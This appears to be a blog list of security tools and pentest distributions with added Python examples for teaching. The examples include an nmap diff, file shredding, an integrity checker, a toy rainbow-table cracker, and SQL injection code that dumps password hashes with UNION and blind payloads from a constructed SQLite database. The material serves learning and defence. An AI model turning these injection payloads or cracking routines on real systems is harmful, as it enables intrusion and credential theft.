Years ago there was a website called astalavista.box.sk. This website was a hub for security tools and learning. Unfortunately this website no longer exists. This made me very sad, so I decided to compile a list of available tools for those interested in moving their knowledge of security further. I have not been able to test every tool or OS included within this list, but I have researched each one and their reputations. If they weren’t worthy then I would not have listed them. These are in no particular order. Use at your own risk, and do not use them for malicious purposes: only test your own systems, or someone else’s with their consent. I will not be held responsible for any result of your use of these tools. Again, use at your own risk, as misuse of some of these tools can result in criminal prosecution. Please review my Terms of Service before utilizing any of the resources found on this page.
NMAP (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. NMAP uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. NMAP runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line NMAP executable, the NMAP suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping). For more information and to download NMAP visit http://nmap.org/
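The most useful habit with NMAP is to keep machine-readable output (nmap -sV -O -oX scan.xml target) and compare runs over time, which is what Ndiff does. As an added example, not code from the page or from the Nmap project, the script below parses two -oX results and reports ports that opened, closed or changed service version between them. The two XML documents are constructed samples trimmed to the elements the parser reads; the host address 192.0.2.10 is a documentation address, not a real target.

```python
"""Ndiff-style comparison of two nmap -oX results (added example, not nmap's code)."""
import xml.etree.ElementTree as ET

# Constructed sample scans of the same host taken at two different times.
SCAN_BEFORE = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.6"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>"""
SCAN_AFTER = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.0"/></port>
      <port protocol="tcp" portid="443"><state state="open"/>
        <service name="https" product="nginx" version="1.20.1"/></port>
    </ports>
  </host>
</nmaprun>"""


def parse_open_ports(xml_text):
    """Return {(addr, proto, port): "name product version"} for open ports on live hosts."""
    inventory = {}
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        addr = addr_el.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise for an inventory diff
            svc = port.find("service")
            desc = ""
            if svc is not None:
                parts = (svc.get("name"), svc.get("product"), svc.get("version"))
                desc = " ".join(p for p in parts if p)
            inventory[(addr, port.get("protocol"), int(port.get("portid")))] = desc
    return inventory


def diff_scans(before_xml, after_xml):
    """Ports newly open, no longer open, and open in both but with a changed service string."""
    before = parse_open_ports(before_xml)
    after = parse_open_ports(after_xml)
    opened = sorted(k for k in after if k not in before)
    closed = sorted(k for k in before if k not in after)
    changed = [(k, before[k], after[k])
               for k in sorted(before.keys() & after.keys()) if before[k] != after[k]]
    return {"opened": opened, "closed": closed, "changed": changed}


if __name__ == "__main__":
    for kind, entries in diff_scans(SCAN_BEFORE, SCAN_AFTER).items():
        for entry in entries:
            print(kind, entry)
```

Only open ports on hosts reported up are inventoried, so a port flipping from closed to filtered does not create churn; a new open port or a changed version string is exactly the kind of event worth an alert when the scan runs on a schedule.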
Snort can perform protocol analysis and content searching/matching. It can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. For more information or to download Snort visit – http://snort.org/snort
Wireshark – Calling itself “the de facto (and often de jure) standard” for network protocol analysis. It performs deep inspection of hundreds of protocols and, unlike many of the similar commercial products, it works on multiple platforms. Operating System: Windows, Linux, OS X. For more information visit – http://www.wireshark.org
Operating Systems loaded with tools and goodies.
Kali Linux, previously known as “BackTrack Linux”.
Kali Linux is a Linux distribution based on Debian GNU/Linux with a primary focus on digital forensics and penetration testing; its predecessor BackTrack was built on Ubuntu. BackTrack includes many integrated security tools and is named after the search algorithm called ‘backtracking’. For more information or to download BackTrack Linux visit http://www.backtrack-linux.org/.
BackBox is a Linux distribution based on Ubuntu. Like BackTrack and NodeZero it has been developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment, and thanks to its own software repositories it is always updated to the latest stable versions of the most used and best-known ethical hacking tools. BackBox is getting more popular by the day; it has a pretty concise looking desktop environment and seems to work very well. BackBox has all the usual suspects for forensic analysis, documentation and reporting, and reverse engineering, with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.
PHLAK (Professional Hacker’s Linux Assault Kit) – PHLAK is a modular security distribution, geared to be used as a live CD. PHLAK was created to become the only tool security professionals would need to perform security analysis, penetration testing, forensics, and security auditing. PHLAK comes with two light GUIs (fluxbox and XFCE4), packages for printing, publishing, a little multimedia, many security tools, and a file cabinet full of security related documentation for your reading/educational purposes. This distro is based on Morphix. http://www.phlak.org/
Inside Security Rescue Toolkit – INSERT is a complete, bootable Linux system. It comes with a graphical user interface running the fluxbox window manager while still being sufficiently small to fit on a credit card-sized CD-ROM. http://www.inside-security.de/insert_en.html
IPFire – IPFire was designed with both modularity and a high-level of flexibility in mind. You can easily deploy many variations of it, such as a firewall, a proxy server or a VPN gateway. The modular design ensures that it runs exactly what you’ve configured it for and nothing more. Everything is simple to manage and update through the package manager, making maintenance a breeze. Homepage – http://www.ipfire.org/
NetSecL is a hardened, live and installable OS based on openSUSE, suitable for desktop, server and penetration testing use. Once installed you get the grsecurity-hardened kernel together with the penetration tools, or you can use the penetration tools directly from the live DVD. Grsecurity is a substantial security enhancement; with it, the NetSecL firewall and the penetration tools you have a normally functional OS and can always check what level of security you have. http://netsecl.com/
Openwall GNU/Linux (OWL) – Openwall GNU/Linux (OWL) is a small, security-enhanced distribution suitable for virtual appliances, hardware appliances, and physical servers. OWL is binary compatible with Red Hat Enterprise Linux. OWL is also used by many security professionals for penetration testing and password cracking. Openwall also develops other security products such as the famous John the Ripper password cracker, phpass, passwdqc, and tcb. http://www.openwall.com/Owl/
WEAKERTH4N – This penetration testing distribution is built from Debian Squeeze and uses Fluxbox for its desktop environment. It is particularly well suited to WiFi hacking since it contains many wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: WiFi attacks, SQL hacking, Cisco exploitation, password cracking, web hacking, Bluetooth, VoIP hacking, social engineering, information gathering, fuzzing, Android hacking, networking and shells.
Bugtraq – Some of the special features included with Bugtraq (as stated on their site) are an expanded range of recognised injection-capable wireless drivers (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and a solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, NOD32, Hashcat, Avira etc. Unique to Bugtraq (as claimed on their site) is the ease of deleting tracks and backdoors. Just from having read about Bugtraq I’m really glad that I can add it to this list, because it sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Bugtraq: malware, penetration shield, web audit, brute force attack, communication, forensic analytics, sniffers, virtualization, anonymity and tracking, mapping and vulnerability detection.
NodeZero – Like BackTrack, NodeZero is an Ubuntu-based distro used for penetration testing. It uses the Ubuntu repositories, so every time Ubuntu releases a patch you are also notified of system updates or upgrades. NodeZero used to be famous for its inclusion of the THC IPv6 Attack Toolkit, which includes tools like alive6, detect-new-ip6, dnsdict6, etc., but I think that these days BackTrack 5 R3 also includes these tools. Whereas BackTrack is touted as a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) states that the distro’s real strength comes from a hard install. NodeZero, in their own words, believes that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable linux environment.” Sounds cool. Ever tried it? Let us know in the comments below.
Samurai Web Testing Framework – This is a live Linux distro that has been pre-configured with some of the best open source and free tools that focus on testing and attacking websites. The difference with the Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) web applications, within a “safe environment”, i.e. so you can practise ethical hacking without violating any laws. The developers outline four steps of a web pen-test. This is a pentesting distro recommended for penetration testers who want to combine network and web app techniques.
Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Gentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a hardened kernel with aufs patches, a backported WiFi stack from the latest stable kernel release, module loading support à la Slax, the XFCE4 window manager, and CUDA/OpenCL cracking support with development tools.
Lightweight Portable Security – Distributed by the US Department of Defense, Lightweight Portable Security (LPS) creates a secure end node from trusted media on almost any Intel-based computer (PC or Mac). LPS boots a thin Linux operating system from a CD or USB flash stick without mounting a local hard drive. Administrator privileges are not required; nothing is installed. The LPS family was created to address particular use cases: LPS-Public is a safer, general-purpose solution for using web-based applications. The accredited LPS-Remote Access is only for accessing your organization’s private network. Homepage – http://spi.dod.mil/lipose.htm
Matriux Krypton – It ships around 300 security tools, organised into groups called “arsenals”. The arsenals cover penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.
Blackbuntu is another penetration testing distro based on Ubuntu, as its name suggests. It uses GNOME as its desktop environment and is built on the Ubuntu 10.10 release. Here are the categories of security and penetration testing tools available within the Blackbuntu package (each category has many sub-categories), which gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section with tools like macchanger and the lynis auditing tool. This list is hardly revolutionary, but the tools contained within might be different from the other distros.
DEFT – DEFT 7 is based on the Linux 3 kernel and includes DART (Digital Advanced Response Toolkit). This distro is oriented towards computer forensics; it uses LXDE as its desktop environment and WINE for running Windows tools under Linux. The developers (based in Italy) hope that their distro will be used by the military, police, investigators, IT auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”.
Knoppix STD – As the name suggests this distribution is based on Knoppix, and STD stands for Security Tools Distribution. This distribution has not had an update in a long time (like many pen-test distros) and might not work on some newer hardware, but it has a fairly good collection of tools. Fluxbox is used as the desktop environment.
Pentoo is a smart and well-equipped Linux distro with various tools, based on Gentoo. It is basically a Gentoo install with lots of customized tools, a customized kernel, and tons more.
This distro is based on Debian and originated in Germany. The architecture is i486 and it runs the following desktops: GNOME, KDE, LXDE and also Openbox.
Knoppix has been around for a long time now – in fact I think it was one of the original live distros. Knoppix is primarily designed to be used as a live CD, but it can also be installed on a hard disk. The STD in the Knoppix STD name stands for Security Tools Distribution. The cryptography section is particularly well known in Knoppix STD.
CAINE stands for Computer Aided Investigative Environment and, like many information security products and tools, it is an Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools as software modules, all presented within a friendly graphical interface. CAINE states three objectives: to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation; to provide a user-friendly graphical interface; and to provide a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open source.
Trinity Rescue Kit – Trinity Rescue Kit or TRK is a free live Linux distribution that aims specifically at recovery and repair operations on Windows machines, but is equally usable for Linux recovery issues. Since version 3.4 it has an easy to use scrollable text menu that allows anyone who masters a keyboard and some English to perform maintenance and repair on a computer, ranging from password resetting over disk cleanup to virus scanning. Homepage – http://trinityhome.org/
Damn Vulnerable Linux (DVL) – Damn Vulnerable Linux (DVL) is a Slackware and Slax-based live DVD. The distribution, purposefully stuffed with broken, ill-configured, outdated and exploitable software, began life as a training system used during the author’s university lectures. Its primary goal is to design a Linux system that is as vulnerable as possible — in order to teach and demonstrate a variety of security topics, including reverse code engineering, buffer overflows, shell code development, web exploitation, and SQL injection.
Vyatta – The free community Vyatta Core software (VC) is an award-winning open source network operating system providing advanced IPv4 and IPv6 routing, stateful firewalling, IPsec and SSL OpenVPN, and more. When you add Vyatta to a standard x86 hardware system, you can create an enterprise grade network appliance that easily scales from DSL to 10Gbps. Vyatta is also optimized to run in VMware, Citrix XenServer, Xen, KVM, and Hyper-V, providing networking and security services to virtual machines and cloud computing environments. Vyatta has been downloaded over 1,000,000 times, has a community of hundreds of thousands of registered users and counts dozens of Fortune 500 businesses among its commercial customers. http://www.vyatta.org (Note: the free Vyatta Core edition was discontinued after Brocade acquired Vyatta; the community continued it as the VyOS fork.)
Wireless network tools.
Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic (devices and drivers permitting). For more information on Kismet visit http://www.kismetwireless.net/index.shtml
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. For more information or to download visit – http://www.cirt.net/
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – GUI for testing wireless encryption strength
Wifi-honey – Creates fake APs using all encryption types and monitors them with Airodump
Wifite – Automated wireless auditor
Blueranger – Uses link quality to locate Bluetooth devices
Netgear-telnetable – Enables the Telnet console on Netgear devices
Security Utilities.
WinSCP – Secure file transfer client for Windows. More info can be found here – http://winscp.net/eng/docs/free_sftp_client_for_windows
BleachBit – Erases the traces of your actions on your computer and speeds up performance by cleaning up your cache, deleting your history, and more. It can also “shred” files or folders by overwriting them so they are harder to recover from your hard drive (see the caveat under Eraser below). Operating System: Windows, Linux. Home page @ http://bleachbit.sourceforge.net
Eraser – Even though you’ve deleted a file, someone may be able to recover it from your hard drive using forensics tools, because deletion only removes the directory entry and leaves the data blocks in place. Eraser overwrites the old file’s blocks before removing it. Caveat: overwriting is only reliable on a plain magnetic disk with a simple filesystem; on SSDs (wear levelling remaps writes to fresh cells), copy-on-write or journaling filesystems, and anything with snapshots or backups, copies of the old data can survive. For those cases full-disk encryption with destruction of the key is the dependable approach. Operating System: Windows. Details can be found here – http://www.heidi.ie/eraser
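To show what “overwrite, then delete” actually involves, and why the fsync and rename steps matter, here is an added example (not Eraser’s or BleachBit’s code): it overwrites a file’s blocks in place with random data and then zeros, forces each pass to the device, renames the file to a random name so the original name is not left in the directory, and only then unlinks it. demo() creates its own sample file in a temporary directory; the caveats above about SSDs and copy-on-write filesystems apply to this code just as much as to the real tools.

```python
"""Overwrite-then-unlink file wiping (added example, not Eraser's own code)."""
import os
import secrets
import tempfile


def overwrite_passes(path, passes=3, chunk=64 * 1024):
    """Overwrite every byte of `path` `passes` times (random data, zeros on the
    last pass). fsync() after each pass so the data reaches the device instead
    of sitting in the page cache. Returns the number of bytes wiped.
    Limitation: on SSDs, CoW/journaling filesystems and snapshots the old
    blocks may survive elsewhere; this only wipes the blocks the file maps to."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for n in range(passes):
            f.seek(0)
            remaining = size
            while remaining > 0:
                length = min(chunk, remaining)
                f.write(bytes(length) if n == passes - 1 else secrets.token_bytes(length))
                remaining -= length
            f.flush()
            os.fsync(f.fileno())
    return size


def shred_file(path, passes=3):
    """Wipe contents, rename to a random name (the original file name would
    otherwise remain recoverable from the directory entry), then unlink."""
    size = overwrite_passes(path, passes)
    anon = os.path.join(os.path.dirname(path) or ".", secrets.token_hex(8))
    os.replace(path, anon)
    os.unlink(anon)
    return size


def demo():
    """Write a known secret into a temp dir, wipe it, and report what is observable."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "secret.txt")
    original = b"top secret\n" * 1000           # constructed sample content
    with open(path, "wb") as f:
        f.write(original)
    wiped = overwrite_passes(path, passes=2)
    with open(path, "rb") as f:
        after_overwrite = f.read()
    shred_file(path, passes=1)
    return {
        "bytes_wiped": wiped,
        "content_replaced": after_overwrite != original,
        "all_zero": after_overwrite == bytes(len(original)),
        "file_gone": not os.path.exists(path),
        "dir_empty": os.listdir(workdir) == [],
    }


if __name__ == "__main__":
    print(demo())
```

The size is read before opening so the wipe covers exactly the existing allocation; it does not touch slack space at the end of the last block or any earlier copies the filesystem may hold, which is why the caveat above matters.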
TrueCrypt – Like the PGP product, TrueCrypt can protect your entire hard drive or thumb drive. Incredibly popular. Operating System: Windows, Linux, OS X. Note that TrueCrypt development ended in May 2014 and its own site now warns that it may contain unfixed security issues; VeraCrypt is the actively maintained fork. For more info and to download visit here – http://www.truecrypt.org
File System Forensics
Odessa – Short for “Open Digital Evidence Search and Seizure Architecture,” ODESSA incorporates a variety of tools for collecting and analyzing digital evidence. Still good for analysis of Internet Explorer cookies and some Windows files. Available for Windows, Linux, OS X. More info can be found here – http://odessa.sourceforge.net
The Sleuth Kit – The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate disk images. The core functionality of TSK allows you to analyze volume and file system data. The plug-in framework allows you to incorporate additional modules to analyze file contents and build automated systems. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence. More info on The Sleuth Kit can be found here – http://www.sleuthkit.org/sleuthkit/
AFICK (Another File Integrity Checker) – Afick is a security tool very similar to the well-known Tripwire. It records a baseline of your file systems, monitors changes against it, and so can detect intrusions; the baseline database itself must be kept where an intruder cannot edit it. http://afick.sourceforge.net/
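What Tripwire and AFICK do is simple to state and worth seeing in code: hash every file once, store the baseline somewhere trustworthy, and later diff a fresh snapshot against it. The following added example (not AFICK’s code) does exactly that with SHA-256 plus size and permission bits. demo() builds a constructed miniature filesystem in a temporary directory, trojans a “binary” while resetting its mtime (timestomping), plants a cron file and removes another file, then reports what the comparison catches.

```python
"""Tripwire/AFICK-style integrity check (added example, not AFICK's own code)."""
import hashlib
import json
import os
import stat
import tempfile


def snapshot(root):
    """Map each regular file under root (relative path) to SHA-256, size, mode bits
    and mtime. Symlinks, devices and sockets are skipped (lstat, no following)."""
    record = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    digest.update(chunk)
            record[os.path.relpath(path, root)] = {
                "sha256": digest.hexdigest(), "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode), "mtime": int(st.st_mtime)}
    return record


def save_baseline(record, path):
    # Keep this file off the monitored host (or on read-only media, or signed):
    # an intruder who can rewrite the baseline can hide any change.
    with open(path, "w") as f:
        json.dump(record, f, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Added/removed paths, and for surviving paths the fields that differ."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for rel in sorted(set(baseline) & set(current)):
        changed = [k for k in ("sha256", "size", "mode") if baseline[rel][k] != current[rel][k]]
        # mtime alone proves nothing (touch resets it), but content changing while
        # mtime stayed put is the classic signature of timestomping.
        if "sha256" in changed and baseline[rel]["mtime"] == current[rel]["mtime"]:
            changed.append("mtime_unchanged")
        if changed:
            modified[rel] = changed
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: trojaned binary, planted cron job, deleted motd."""
    root = tempfile.mkdtemp()
    fixed_time = 1_600_000_000  # deterministic mtime for the scenario

    def put(rel, data, mtime=fixed_time):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
        os.utime(full, (mtime, mtime))

    put("etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n")
    put("bin/ls", b"\x7fELF original")
    put("etc/motd", b"welcome\n")
    fd, db_path = tempfile.mkstemp(suffix=".json")   # baseline lives outside root
    os.close(fd)
    save_baseline(snapshot(root), db_path)

    put("bin/ls", b"\x7fELF trojaned")                # same size, mtime reset: timestomped
    put("etc/cron.d/backdoor", b"* * * * * root /tmp/x\n")
    os.unlink(os.path.join(root, "etc", "motd"))
    return compare(load_baseline(db_path), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Size and mtime are recorded because they are cheap to check, but only the hash is authoritative: the trojaned file in the demo keeps both its size and its timestamp and is still caught.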
Ophcrack – Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a graphical user interface and runs on multiple platforms. More info on Ophcrack can be found here – http://ophcrack.sourceforge.net/
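Rainbow tables trade a large one-off precomputation for fast lookups: you store only the start and end of long hash/reduce chains, then regenerate the chain on demand. The added example below (not Ophcrack’s code) implements that idea end to end on a toy keyspace, SHA-1 over three-character lowercase passwords instead of the LM/NTLM hashes Ophcrack targets, so it builds in a second. The reduction function, chain length and table size are arbitrary choices made for the example.

```python
"""Toy rainbow table: build chains, then crack by regenerating them (added example)."""
import hashlib
import random
import string

ALPHABET = string.ascii_lowercase
PW_LEN = 3
KEYSPACE = len(ALPHABET) ** PW_LEN     # 17,576 possible passwords
CHAIN_LEN = 50                         # reductions per chain


def H(pw):
    """The hash being attacked (SHA-1 here; real tables target LM/NTLM)."""
    return hashlib.sha1(pw.encode()).digest()


def R(digest, i):
    """Reduction function i: map a digest back to a candidate password.
    Using a different function per column is what makes it a *rainbow* table:
    two chains that collide in one column diverge again in the next."""
    n = (int.from_bytes(digest[:8], "big") + i * 0x9E3779B1) % KEYSPACE
    out = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        out.append(ALPHABET[r])
    return "".join(out)


def chain_element(start, j):
    """Password in column j of the chain beginning at `start` (column 0)."""
    pw = start
    for k in range(j):
        pw = R(H(pw), k)
    return pw


def build_table(n_chains, seed=1):
    """Precompute: only endpoint -> start is stored, not the 50 hashes in between."""
    rng = random.Random(seed)
    table = {}
    for _ in range(n_chains):
        start = "".join(rng.choice(ALPHABET) for _ in range(PW_LEN))
        table[chain_element(start, CHAIN_LEN)] = start
    return table


def crack(table, target):
    """Assume the target hash sits in column i, run the chain forward to its
    endpoint, and if that endpoint is known, replay the chain from its start."""
    for i in range(CHAIN_LEN - 1, -1, -1):
        x = R(target, i)
        for k in range(i + 1, CHAIN_LEN):
            x = R(H(x), k)
        start = table.get(x)
        if start is None:
            continue
        pw = start
        for k in range(CHAIN_LEN):
            if H(pw) == target:
                return pw
            pw = R(H(pw), k)
        # Endpoint matched but the chain never produced the target: a false
        # alarm caused by a merge; keep trying other columns.
    return None


if __name__ == "__main__":
    table = build_table(2000)
    victim = chain_element(next(iter(table.values())), 7)
    print(victim, "->", crack(table, H(victim)))
```

Coverage is probabilistic: 2000 chains of length 50 touch at most 100,000 candidate slots in a 17,576-entry keyspace, with many merges, so some passwords are missed; real tables use millions of chains and report a success rate rather than a guarantee. Salted hashes defeat the whole approach, which is why Ophcrack works against unsalted LM/NTLM and not against modern password stores.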
Server Exploitation Tools
Xenotix XSS Exploit Framework – Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. This tool injects payloads into web pages that are vulnerable to XSS. It is basically a payload-list based XSS scanner and XSS exploitation kit. It gives a penetration tester the ability to test all the XSS payloads in the payload list against a web application. The tool supports both a manual mode and an automated, time-sharing based test mode. The exploitation framework in the tool includes an XSS encoder, a victim-side XSS keystroke logger, an executable drive-by downloader and an XSS reverse shell. These exploitation tools help the penetration tester create proof of concept attacks on vulnerable web applications for the penetration test report.
Websploit – Scans & analyses remote systems for vulnerabilities
Htexploit – Tool to bypass .htaccess-based directory protection
Tnscmd10g – Sends commands to an Oracle TNS listener
BBQSQL – Blind SQL injection toolkit
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Havij – Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. By using this software one can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.
Awesome tutorial for Havij found here – http://jameslovecomputers.wordpress.com/category/tutorials/backtrack-tutorials/web-exploitation-tools-backtrack-tutorials/
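The steps Havij automates (fingerprint the DBMS, list tables, dump hashes) and the blind technique BBQSQL specialises in all come from the same root cause: user input concatenated into a query. The added example below, not Havij’s or BBQSQL’s code, puts the vulnerable query next to its parameterized fix on a constructed in-memory SQLite database, then drives the vulnerable one with UNION payloads and with a boolean-based blind extraction that recovers a hash one bit per request. The schema, users and hashes are made up for the example.

```python
"""SQL injection: vulnerable vs parameterized query, UNION dump, blind extraction (added example)."""
import sqlite3


def make_db():
    """Constructed sample application database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO users(name, pw_hash) VALUES
            ('alice', '5f4dcc3b5aa765d61d8327deb882cf99'),
            ('bob',   'e10adc3949ba59abbe56e057f20f883e');
        CREATE TABLE products(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO products(title) VALUES ('widget'), ('gadget');
    """)
    return db


def search_vulnerable(db, title):
    # String concatenation: the request parameter is parsed as SQL.
    sql = "SELECT title FROM products WHERE title = '" + title + "'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, title):
    # Bound parameter: the value is sent separately and never parsed as SQL.
    return [row[0] for row in db.execute("SELECT title FROM products WHERE title = ?", (title,))]


# --- what an injection tool automates against search_vulnerable ---------------

def fingerprint(db):
    return search_vulnerable(db, "' UNION SELECT sqlite_version()--")


def list_tables(db):
    return search_vulnerable(db, "' UNION SELECT name FROM sqlite_master WHERE type='table'--")


def dump_users(db):
    return search_vulnerable(db, "' UNION SELECT name || ':' || pw_hash FROM users--")


def oracle(db, cond):
    """Boolean-based blind injection: the page shows rows iff `cond` is true,
    so each request leaks one bit even when no query output is reflected."""
    return bool(search_vulnerable(db, "zzz' OR (" + cond + ")--"))


def blind_extract(db, subquery, max_len=40):
    """Recover the string returned by `subquery` via binary search on each
    character's code point (about 7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # substr past the end yields '' and unicode('') is NULL: string finished
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("version:", fingerprint(db))
    print("tables:", list_tables(db))
    print("dump:", dump_users(db))
    print("blind:", blind_extract(db, "SELECT pw_hash FROM users WHERE name='alice'"))
    print("safe:", search_safe(db, "' OR '1'='1"))
```

The same payloads do nothing against search_safe: the bound parameter is compared as a literal title, so the query simply returns no rows. Parameterizing every query is the fix; input filtering is not, because the UNION and blind payloads above contain nothing a generic filter can reject without breaking legitimate input.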